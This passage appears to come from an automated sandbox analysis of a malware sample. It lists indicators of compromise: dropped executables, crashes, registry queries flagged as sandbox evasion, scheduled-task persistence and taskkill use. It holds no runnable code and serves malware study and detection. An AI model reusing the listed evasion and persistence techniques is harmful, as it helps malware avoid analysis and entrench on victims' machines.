J9zM_BwL31SvyQCz441NjFE2.exe7PEDuinOLwXYX_6iGkQn8Cc8.exelakazet.exelakazet.exeSat169c60f22b8.tmpdescription ioc process File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe J9zM_BwL31SvyQCz441NjFE2.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 7PEDuinOLwXYX_6iGkQn8Cc8.exe File created C:\Program Files (x86)\Windows NT\Camejogufu.exe lakazet.exe File created C:\Program Files (x86)\Windows NT\Camejogufu.exe.config lakazet.exe File created C:\Program Files\Microsoft Office\DUAUIWDTOW\foldershare.exe lakazet.exe File created C:\Program Files (x86)\Windows Mail\Jaqewuvuhae.exe.config lakazet.exe File created C:\Program Files\MSBuild\JMQTECCOCB\foldershare.exe lakazet.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sat169c60f22b8.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-J7VNH.tmp Sat169c60f22b8.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe J9zM_BwL31SvyQCz441NjFE2.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe J9zM_BwL31SvyQCz441NjFE2.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 7PEDuinOLwXYX_6iGkQn8Cc8.exe File created C:\Program Files\Microsoft Office\DUAUIWDTOW\foldershare.exe.config lakazet.exe File created C:\Program Files (x86)\Windows Mail\Jaqewuvuhae.exe lakazet.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sat169c60f22b8.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\inst2.exe J9zM_BwL31SvyQCz441NjFE2.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini J9zM_BwL31SvyQCz441NjFE2.exe File created C:\Program Files\MSBuild\JMQTECCOCB\foldershare.exe.config lakazet.exe -
Drops file in Windows directory 38 IoCs
Processes:
msiexec.exesvchost.exeuNllGlcbm2GVjpyTbg93jDn7.exeWerFault.exesvchost.exeMsiExec.exedescription ioc process File opened for modification C:\Windows\Installer\f77d9ae.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIC6F9.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File created C:\Windows\System\xxx1.bak uNllGlcbm2GVjpyTbg93jDn7.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI15BE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7FFA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7569.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\System\xxx1.bak svchost.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI29E5.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFBD1AF643B10569D1.TMP msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\Installer\MSI39C5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7904.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID775.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDB3E.tmp msiexec.exe File created C:\Windows\Installer\f77d9ae.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI22DF.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF97FC8785AB81420C.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFB6DAF3930905E7B6.TMP msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\System\svchost.exe uNllGlcbm2GVjpyTbg93jDn7.exe File created C:\Windows\System\svchost.exe uNllGlcbm2GVjpyTbg93jDn7.exe File opened for modification C:\Windows\Installer\MSIF544.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1B8B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI356F.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF7E26EF0C798C8356.TMP msiexec.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\Installer\MSI877D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI877E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6D59.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 30 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6396 5192 WerFault.exe rundll32.exe 6764 4552 WerFault.exe Sat160ff2e199851.exe 6892 5028 WerFault.exe Sat1682c535a6fcb6e7.exe 5992 3676 WerFault.exe Sat16156abf9c.exe 5784 1100 WerFault.exe 5X4Z1tG8vqSmImDuhk43ndKc.exe 3276 2216 WerFault.exe Worldoffer.exe 4740 6564 WerFault.exe ey4uvXWEOUalkU_eykdaluyu.exe 4112 1628 WerFault.exe Xf_zx9O1XjyURUhCmLjojbZL.exe 3912 7040 WerFault.exe chrome update.exe 2108 5048 WerFault.exe chrome1.exe 7220 3568 WerFault.exe 7o86wFKJyInJIOUE8xaT8jW5.exe 7164 6812 WerFault.exe rundll32.exe 7448 5028 WerFault.exe LzmwAqmV.exe 4552 2616 WerFault.exe rGwY69WmOM_qqsBGjBQCwu70.exe 4004 5288 WerFault.exe WBGMEjP2ZOPhKrFm3D2PsxK2.exe 7728 3532 WerFault.exe I43HlxEfzYdBanh5sTg7Y_zX.exe 1924 2396 WerFault.exe B9fyo7QqeK801elsQ3zzApZx.exe 2196 3560 WerFault.exe UiCHUYf2DCZO0cVtFmpt1M5s.exe 5684 6628 WerFault.exe rundll32.exe 7620 720 WerFault.exe 41QX82bYGlA3Bkj6dsFQtiUV.exe 8080 2192 WerFault.exe vg9O1s8jU7nNIaD25edzyuif.exe 3568 8084 WerFault.exe C292.exe 10392 10244 WerFault.exe rundll32.exe 11152 8840 WerFault.exe 34D6.exe 12560 12316 WerFault.exe rundll32.exe 13784 12300 WerFault.exe build.exe 13936 12232 WerFault.exe ganfarm.exe 16132 12040 WerFault.exe D938.exe 16776 16516 WerFault.exe rundll32.exe 19416 18908 WerFault.exe srvs.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
fBp6HqC0_TNfSR_tIpttHvQC.exe4BF9.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fBp6HqC0_TNfSR_tIpttHvQC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4BF9.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4BF9.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4BF9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fBp6HqC0_TNfSR_tIpttHvQC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fBp6HqC0_TNfSR_tIpttHvQC.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesrvs.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execontrol.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString srvs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 control.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz control.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 srvs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 control.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2256 schtasks.exe 2292 schtasks.exe 5964 schtasks.exe 5320 schtasks.exe 6960 schtasks.exe -
Enumerates system info in registry 2 TTPs 63 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execontrol.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS control.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU control.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 6320 taskkill.exe 6792 taskkill.exe 1604 taskkill.exe 7336 taskkill.exe 1700 taskkill.exe 9340 taskkill.exe 13648 taskkill.exe 1340 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WaaSMedicAgent.exesvchost.exeWaaSMedicAgent.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created 